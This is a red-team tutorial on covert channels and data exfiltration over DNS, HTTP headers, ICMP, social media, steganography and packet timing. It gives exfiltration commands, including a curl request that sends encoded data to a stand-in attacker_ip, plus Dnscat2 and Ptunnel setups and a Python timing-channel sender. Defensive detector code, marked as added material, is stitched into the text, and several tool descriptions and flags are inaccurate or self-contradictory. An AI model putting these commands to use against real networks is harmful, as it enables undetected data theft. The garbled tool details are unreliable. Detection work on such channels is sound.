As a Red Team operator, one of the most important aspects of your job is to exfiltrate data from your target’s network without being detected. In this article, we will discuss some of the covert channels and exfiltration techniques that can be used for this purpose.

Covert Channels

A covert channel is a communication path built on a mechanism that was never intended to carry data between the two parties using it. For example, an attacker can use a covert channel to communicate with a compromised system without being detected by the system’s security mechanisms. Some examples of covert channels include:

DNS Tunneling

DNS tunneling involves using the DNS protocol to send and receive data. This technique can be used to bypass firewalls and other security mechanisms that block other types of traffic. For example, an attacker can use the DNS protocol to send commands to, and receive output from, a compromised system.

To use DNS tunneling, the attacker can set up a DNS server that can receive and interpret DNS requests. The attacker can then encode data in the DNS requests and send them to the compromised system. The compromised system can then decode the data and send it back to the attacker through the DNS requests.

Tools like Dnscat2, Iodine, and Dns2tcp can be used to create DNS tunnels.

HTTP/S Tunneling

HTTP/S tunneling involves using the HTTP/S protocol to send and receive data. This technique can be used to bypass firewalls and other security mechanisms that block other types of traffic. For example, an attacker can use the HTTP/S protocol to send commands to, and receive output from, a compromised system.

To use HTTP/S tunneling, the attacker can set up a web server that can receive and interpret HTTP/S requests. The attacker can then encode data in the HTTP/S requests and send them to the compromised system. The compromised system can then decode the data and send it back to the attacker through the HTTP/S requests.

Tools like Chisel, HTTPTunnel, and Httptunnel-ng can be used to create HTTP/S tunnels.

ICMP Tunneling

ICMP tunneling involves using the ICMP protocol to send and receive data. This technique can be used to bypass firewalls and other security mechanisms that block other types of traffic. For example, an attacker can use the ICMP protocol to send commands to, and receive output from, a compromised system.

To use ICMP tunneling, the attacker can set up an ICMP server that can receive and interpret ICMP requests. The attacker can then encode data in the ICMP requests and send them to the compromised system. The compromised system can then decode the data and send it back to the attacker through the ICMP requests.

Tools like ICMPTunnel and Ptunnel can be used to create ICMP tunnels.

Exfiltration Techniques

Exfiltration is the process of stealing data from a target’s network. Red Team operators need to be able to exfiltrate data without being detected. Some examples of exfiltration techniques include:

Steganography

Steganography is the art of hiding data within another file. It involves embedding the data within a file so that it is not visible to the naked eye. For example, an attacker can hide data within an image or a video file. The attacker can then exfiltrate the file without being detected.

To use steganography, the attacker can use tools like Steghide, OpenStego, or Stegano to embed data within an image or a video file. Let’s take a look at Steghide in action:

$ steghide embed -cf image.jpg -ef secret.txt -p password

This command will embed the secret.txt file within the image.jpg file using the password “password”. The resulting file will look identical to the original image to a viewer, although its bytes differ, and it will contain the secret.txt file within it.

To extract the hidden data, the attacker can use the following command:

$ steghide extract -sf image.jpg -p password

This command will extract the secret.txt file from the image.jpg file using the password “password”.

Out-of-band Exfiltration

Out-of-band exfiltration involves using a separate channel or protocol to exfiltrate data, separate from the primary communication channel. This technique can be used to bypass firewalls and other security mechanisms that block the primary communication channel.

Let’s take a look at an advanced example of out-of-band exfiltration.

One advanced example of out-of-band exfiltration is using covert timing channels to exfiltrate data. Covert timing channels involve encoding data in the timing of network traffic, such as the time between packets or the timing of packets themselves.

For example, the attacker could encode data in the timing between DNS requests: a program sends DNS requests to a DNS server, and the delay between consecutive requests carries the encoded data, with a short delay indicating a “0” bit and a longer delay indicating a “1” bit.

Here’s an example of how this could be done using Python:

import socket
import time

def exfiltrate_data(encoded_data):
    dns_server = "dns_server_ip"  # placeholder for the resolver's address
    delay_0 = 0.1  # seconds of silence before a "0" bit
    delay_1 = 0.2  # seconds of silence before a "1" bit

    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect((dns_server, 53))

    for bit in encoded_data:
        # The information is carried by the pause, not by the datagram's contents.
        if bit == "0":
            time.sleep(delay_0)
        elif bit == "1":
            time.sleep(delay_1)

        # UDP sockets take bytes, not str. This placeholder payload is not a
        # well-formed DNS query; it only marks the end of each timed gap.
        s.send(b"dns_request_data")

    s.close()

This Python program creates a UDP socket and connects to the DNS server at dns_server_ip. For every bit it pauses and then sends one datagram (the placeholder payload stands in for a real DNS query), so the spacing between datagrams, not their contents, carries the encoded data. The delay_0 and delay_1 variables specify the delay times for “0” and “1” bits, respectively.

Using covert timing channels to exfiltrate data can be effective, but it also has its risks. Covert timing channels can be difficult to implement correctly and can be detected by some network security solutions that monitor network traffic for unusual timing patterns.

Additionally, encoding data in the timing of network traffic can be relatively slow and inefficient, limiting the amount of data that can be exfiltrated in a given period of time. As with all exfiltration techniques, it’s important to carefully consider the target environment and the specific exfiltration technique being used to ensure its effectiveness and stealth.
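The sender above hides bits in pauses, so the defender's counterpart is a check on the inter-arrival times of queries from a single client. The following is an added example, not code from the original article: it builds constructed timestamps for the covert pattern and for ordinary bursty name resolution, then flags a gap sequence that falls into two tight, well-separated clusters and, for the analyst, recovers the bit string those thresholds imply. The sample data, the thresholds and the helper names are assumptions.

```python
from statistics import mean, pstdev

# Constructed sender-side pattern: 0.1 s gap for a "0" bit, 0.2 s for a "1",
# plus a little network jitter, mirroring the sender sketched above.
BITS = "0110100101001011"
JITTER = [0.003, -0.002, 0.004, -0.004, 0.001, 0.002, -0.003, 0.000,
          0.004, -0.001, -0.004, 0.003, 0.002, -0.002, 0.001, -0.003]

def build_covert_timestamps(bits=BITS, jitter=JITTER):
    """Constructed query-arrival timestamps (seconds) for the covert sender."""
    t, stamps = 0.0, [0.0]
    for bit, j in zip(bits, jitter):
        t += (0.1 if bit == "0" else 0.2) + j
        stamps.append(t)
    return stamps

# Constructed benign timestamps: bursty, heavy-tailed gaps of the kind a
# workstation produces while a user browses.
BENIGN_TIMESTAMPS = [0.0, 0.03, 0.9, 1.2, 1.25, 4.8, 5.1, 9.3, 9.31, 12.0,
                     12.7, 15.2, 20.1, 20.15, 20.9, 26.3, 30.0]

def inter_arrival_times(timestamps):
    """Gaps between consecutive queries from one client, in seconds."""
    ts = sorted(timestamps)
    return [b - a for a, b in zip(ts, ts[1:])]

def analyse_timing(gaps, min_samples=16, max_spread=0.15, min_ratio=1.5):
    """Flag a gap sequence that is tightly bimodal: split at the midpoint of
    the smallest and largest gap, then require both halves to be narrow
    clusters (low coefficient of variation) that are clearly separated.
    Returns (suspicious, bits) with bits decoded as short=0 / long=1."""
    if len(gaps) < min_samples:
        return False, ""
    cut = (min(gaps) + max(gaps)) / 2
    low = [g for g in gaps if g < cut]
    high = [g for g in gaps if g >= cut]
    if not low or not high:
        return False, ""
    tight = all(pstdev(grp) / mean(grp) < max_spread for grp in (low, high))
    separated = mean(high) / mean(low) >= min_ratio
    bits = "".join("0" if g < cut else "1" for g in gaps)
    return tight and separated, bits

if __name__ == "__main__":
    for label, stamps in (("covert", build_covert_timestamps()),
                          ("benign", BENIGN_TIMESTAMPS)):
        print(label, analyse_timing(inter_arrival_times(stamps)))
```

Real traffic needs per-client windows and a false-positive review, since polling clients with fixed intervals can also look regular; the two-cluster requirement is what separates them from the single-interval case.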

Social Media Exfiltration

Social media platforms are a common form of communication, and their traffic is typically allowed through firewalls and other security mechanisms. This makes social media a potentially effective channel for exfiltrating data in a covert manner.

To use social media as a covert channel, the attacker can set up an account on a social media platform and use it to communicate with a compromised system. The attacker can then encode the exfiltrated data in social media posts, comments, or direct messages.

For example, the attacker could use Twitter to create a covert channel. The attacker could set up a Twitter account and post messages that contain encoded data. The encoded data could be hidden within the message text, hashtags, or even in the URL of a linked website. The attacker could then use a script to periodically check the Twitter account and retrieve the encoded data.

Here’s an example of how this could be done using Python:

import tweepy

consumer_key = 'YOUR_CONSUMER_KEY'
consumer_secret = 'YOUR_CONSUMER_SECRET'
access_token = 'YOUR_ACCESS_TOKEN'
access_token_secret = 'YOUR_ACCESS_TOKEN_SECRET'

auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)

api = tweepy.API(auth)

def check_twitter():
    collected = []
    tweets = api.user_timeline()
    for tweet in tweets:
        # check for encoded data in tweet text, hashtags, or linked URLs,
        # then decode the data and store it (the decoding scheme is not shown here)
        collected.append(tweet.text)
    return collected

This Python script uses the Tweepy library to authenticate with the attacker’s Twitter account and retrieve the user’s timeline. The script then checks each tweet for encoded data and decodes it, storing it for later use.

Using social media as a covert channel for exfiltrating data can be effective, but it also has its risks. Social media platforms are monitored by security teams and law enforcement, so it’s important to carefully consider the target environment and the specific social media platform being used to ensure its effectiveness and stealth. It’s also important to use strong encryption and encoding techniques to ensure that the data being exfiltrated remains secure and cannot be easily decoded by unauthorized parties.

HTTP Exfiltration

Including data in HTTP headers is another way to exfiltrate data over HTTP in a covert manner. This technique involves encoding the data in the headers of HTTP requests and sending them to a web server. The web server can then decode the data and store it.

Here’s an example of how this technique could be used:

On the compromised machine:

$ curl --header "X-Exfil-Data: encoded_data" http://attacker_ip

This command uses the curl tool to send an HTTP request to the attacker’s web server at attacker_ip. The data to be exfiltrated is encoded and included in the “X-Exfil-Data” header of the HTTP request.

On the attacker’s machine:

$ tail -f access.log | grep "X-Exfil-Data"

This command uses the tail and grep tools to monitor the access log of the web server. The grep tool searches for HTTP requests that contain the “X-Exfil-Data” header, indicating that exfiltration data is present. Note that the default access-log formats of Apache and nginx record only the request line, Referer and User-Agent, so a custom header such as X-Exfil-Data only appears in access.log if the server’s log format has been configured to include it.

With this technique, the attacker can encode data in the headers of HTTP requests and send them to the web server, which can decode the data and store it. The data can then be retrieved by the attacker at a later time. Since HTTP traffic is typically allowed through firewalls and other security mechanisms, this technique can be effective at bypassing these security controls and exfiltrating data in a covert manner.

However, it’s important to note that some network security solutions may still detect HTTP exfiltration channels by monitoring the size and frequency of HTTP requests, so it’s important to carefully consider the target environment and the specific exfiltration technique being used to ensure its effectiveness and stealth. Additionally, encoding the data in the headers of HTTP requests may limit the amount of data that can be exfiltrated in each request, making it less efficient for exfiltrating large amounts of data.

DNS Exfiltration

DNS exfiltration involves using the DNS protocol to exfiltrate data. This technique can be used to bypass firewalls and other security mechanisms that block other types of traffic. For example, an attacker can use the DNS protocol to exfiltrate data from a compromised system.

To use DNS exfiltration, the attacker can set up a DNS server that can receive and interpret DNS requests. The attacker can then encode the data in the DNS requests and send them to the DNS server. The DNS server can then decode the data and store it.

Tools like Dnscat2, Iodine, and Dns2tcp can be used to create DNS exfiltration channels.

Let’s take a look at how Dnscat2 can be used to create a DNS exfiltration channel:

On the attacker’s machine:

$ dnscat2 -r dns_server_domain

This command starts the Dnscat2 tool in server mode and specifies the domain of the DNS server.

On the compromised machine:

$ dnscat2 -c dns_server_domain

This command starts the Dnscat2 tool in client mode and specifies the domain of the DNS server.

The client can then use Dnscat2 to send and receive data through the DNS exfiltration channel.
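Because tunnelled data has to travel inside query names, the defender-side check that belongs with this section is a query-log scorer. The block below is an added example, not part of the original article or of Dnscat2: it reads a constructed resolver log, scores each subdomain by length and Shannon entropy, and reports registered domains that receive several distinct encoded-looking labels. The log layout, the thresholds and the two-label domain split are assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log in a simplified "<epoch> <client> <qtype> <qname>"
# layout; the tunnel.example.net queries imitate hex-encoded data chunks.
SAMPLE_LOG = """\
1700000001 10.0.0.5 A www.example.com
1700000002 10.0.0.5 A static-assets-static-assets-cdn1.example.com
1700000003 10.0.0.7 TXT 0123456789abcdef0123456789abcdef.tunnel.example.net
1700000004 10.0.0.7 TXT 123456789abcdef0123456789abcdef0.tunnel.example.net
1700000005 10.0.0.5 AAAA mail.example.org
1700000006 10.0.0.7 TXT fedcba9876543210fedcba9876543210.tunnel.example.net
1700000007 10.0.0.9 A www.example.net
"""

def shannon_entropy(text):
    """Bits of entropy per character; encoded payloads score high."""
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())

def split_qname(qname):
    """Return (registered_domain, subdomain) using the last two labels.
    Assumption for brevity: a production detector would use the public
    suffix list so that names such as example.co.uk are split correctly."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])

def find_exfil_domains(log, min_sub_len=30, min_entropy=3.5, min_unique=3):
    """Count distinct long, high-entropy subdomains per registered domain and
    report the domains that exceed min_unique, with the clients involved."""
    seen = defaultdict(set)
    clients = defaultdict(set)
    for line in log.splitlines():
        _ts, client, _qtype, qname = line.split()
        domain, sub = split_qname(qname)
        if len(sub) >= min_sub_len and shannon_entropy(sub) >= min_entropy:
            seen[domain].add(sub)
            clients[domain].add(client)
    return {d: {"unique_subdomains": len(s), "clients": sorted(clients[d])}
            for d, s in seen.items() if len(s) >= min_unique}

if __name__ == "__main__":
    print(find_exfil_domains(SAMPLE_LOG))
```

The long but readable static-assets name stays below the entropy threshold, which is what keeps CDN-style hostnames out of the report.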

ICMP Exfiltration

ICMP exfiltration involves using the ICMP protocol to exfiltrate data. This technique can be used to bypass firewalls and other security mechanisms that block other types of traffic. For example, an attacker can use the ICMP protocol to exfiltrate data from a compromised system.

To use ICMP exfiltration, the attacker can set up an ICMP server that can receive and interpret ICMP requests. The attacker can then encode the data in the ICMP requests and send them to the ICMP server. The ICMP server can then decode the data and store it.

Tools like ICMPTunnel and Ptunnel can be used to create ICMP exfiltration channels.

Let’s take a look at how Ptunnel can be used to create an ICMP exfiltration channel:

On the attacker’s machine:

$ ptunnel -p 80 -lp 8000 -da icmp_server_ip -dp 1234

This command starts the Ptunnel tool and specifies that it should listen on port 80, bind to port 8000, and send data to the ICMP server at icmp_server_ip on port 1234.

On the compromised machine:

$ ptunnel -c icmp_server_ip -lp 1234 -da attacker_ip -dp 8000

This command starts the Ptunnel tool and specifies that it should connect to the ICMP server at icmp_server_ip on port 1234, bind to port 8000, and send data to the attacker’s machine at attacker_ip on port 80.

The client can then use Ptunnel to send and receive data through the ICMP exfiltration channel.
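A tunnel has to put its data into ICMP echo payloads, which stock ping clients fill with predictable bytes, so a simple defensive check is to parse each echo message and compare its payload with those stock patterns. The following is an added example, not code from the article or from Ptunnel; the reference patterns for Linux iputils (bytes 0x10 upward after a 16-byte timestamp) and Windows ping (a fixed 32-byte alphabet) are assumptions taken from common captures, as are the size limit and the function names.

```python
import struct

# Assumed stock ping payloads: Windows ping sends this fixed 32-byte string;
# Linux iputils sends 56 bytes, a 16-byte timestamp then bytes 0x10, 0x11, ...
WINDOWS_PATTERN = b"abcdefghijklmnopqrstuvwabcdefghi"

def icmp_checksum(data):
    """RFC 1071 ones'-complement checksum; 0 when run over a valid message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    total = (total >> 16) + (total & 0xFFFF)
    total += total >> 16
    return ~total & 0xFFFF

def build_echo_request(payload, ident=0x1234, seq=1):
    """Constructed ICMP echo request (type 8, code 0) with a valid checksum."""
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload

def parse_icmp(packet):
    """Split an ICMP message into its header fields and payload."""
    icmp_type, code, csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {"type": icmp_type, "code": code, "checksum": csum,
            "id": ident, "seq": seq, "payload": packet[8:]}

def looks_like_ping(payload):
    """True when the payload matches one of the assumed stock patterns."""
    if payload == WINDOWS_PATTERN:
        return True
    return len(payload) == 56 and all(payload[i] == i for i in range(16, 56))

def assess_echo(packet, max_payload=64):
    """Return 'benign' or a short reason the echo message deserves a look."""
    if len(packet) < 8:
        return "truncated"
    msg = parse_icmp(packet)
    if msg["type"] not in (0, 8):
        return "not-echo"
    if icmp_checksum(packet) != 0:
        return "bad-checksum"
    if len(msg["payload"]) > max_payload:
        return "oversized-payload"
    if not looks_like_ping(msg["payload"]):
        return "non-standard-payload"
    return "benign"
```

In a sensor this would run on the ICMP portion of each captured packet, and the per-host rate of echo messages is worth counting alongside the verdicts, since a tunnel also produces far more echoes than an occasional ping.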

Real-World Examples

Let’s take a look at some real-world examples of covert channels and exfiltration techniques in action:

  1. APT10 Group: The APT10 group, also known as Stone Panda, is a Chinese hacking group that has been active since at least 2009. In 2018, the group was accused of stealing sensitive data from companies in the United States and Europe.

    The group used a custom-built malware called “RedLeaves” to steal data from its targets. RedLeaves used a covert channel to communicate with the group’s command-and-control server. The covert channel used the HTTP protocol to send and receive data.

  2. APT29 Group: The APT29 group, also known as Cozy Bear, is a Russian hacking group that has been active since at least 2010. In 2016, the group was accused of hacking into the Democratic National Committee’s (DNC) computer network.

    The group used a custom-built malware called “CozyDuke” to steal data from the DNC’s network. CozyDuke used a covert channel to communicate with the group’s command-and-control server. The covert channel used the HTTP protocol to send and receive data.

  3. Operation Aurora: Operation Aurora was a cyber attack that occurred in 2009 and 2010. The attack targeted several large companies, including Google, Adobe, and Intel.

    The attackers used a custom-built malware called “Hydraq” to steal data from the targeted companies. Hydraq used a covert channel to communicate with the attackers’ command-and-control server. The covert channel used the HTTP protocol to send and receive data.

Conclusion

In conclusion, Red Team operations require advanced and covert techniques for communication and exfiltration. Covert communication channels are essential to ensure that the Red Team operators can communicate and exfiltrate data without detection. In this article, we have explored a range of covert communication and exfiltration techniques, from protocol-level channels to out-of-band exfiltration techniques.

It is important to note that every target environment is different, and the appropriate communication and exfiltration techniques will depend on the specific target and the security mechanisms in place. Red Team operators must carefully consider their options and choose the appropriate techniques based on their goals and the target environment.

It is also important to use strong encryption and encoding techniques to ensure that the data being exfiltrated remains secure and cannot be easily decoded by unauthorized parties. Additionally, Red Team operators should regularly test and evaluate their communication and exfiltration techniques to ensure their effectiveness and stealth.

Overall, Red Team operations require advanced techniques and careful planning to be successful. By using covert communication and exfiltration techniques, Red Team operators can communicate and exfiltrate data without detection, enabling them to achieve their goals and provide valuable insights into the security posture of the target environment.